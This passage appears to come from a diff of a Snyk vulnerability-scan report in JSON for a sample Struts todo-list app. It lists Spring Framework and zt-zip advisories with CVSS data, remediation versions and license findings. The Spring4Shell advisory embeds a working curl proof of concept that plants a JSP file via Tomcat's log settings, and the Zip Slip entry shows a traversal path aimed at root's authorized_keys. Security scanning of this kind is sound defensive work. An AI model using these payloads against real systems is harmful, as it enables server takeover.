"org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- 
[Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - 
"[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. 
\r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara 
Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", 
- "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.20.RELEASE", - "org.springframework:spring-beans@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.22.RELEASE", - "org.springframework:spring-beans@5.2.22.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, 
- "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of 
Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", - "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "credit": [ - "Snyk Security research Team" - ], - "semver": { - "vulnerable": [ - "[,1.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.5, - "functions": [ - { - "version": [ - "[,1.13)" - ], - "functionId": { - "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", - "className": "ZipUtil$Unpacker", - "functionName": "process" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.zeroturnaround:zt-zip", - "references": [ - { - "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/snyk/zip-slip-vulnerability", - "title": "Zip Slip Advisory" - }, - { - "url": "https://security.snyk.io/research/zip-slip-vulnerability", - "title": "Zip Slip Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 5.5, - "modificationTime": "2024-03-11T09:47:21.493786Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:19.847161Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:21.493786Z" - } - ], - "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", - "epssDetails": { - "percentile": "0.34705", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1002201" - ], - "CWE": [ - "CWE-29" - ] - }, - "packageName": "org.zeroturnaround:zt-zip", - "proprietary": true, - "creationTime": "2018-05-30T12:32:02.349000Z", - "functions_new": [ - { - "version": [ - "[,1.13)" - ], - "functionId": { - "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", - "functionName": "process" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-04-17T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.zeroturnaround", - "artifactId": "zt-zip" - }, - "publicationTime": "2018-05-31T07:32:02Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:21.493786Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"org.zeroturnaround:zt-zip@1.12" - ], - "upgradePath": [ - false, - "org.zeroturnaround:zt-zip@1.13" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.zeroturnaround:zt-zip", - "version": "1.12" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 
"org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 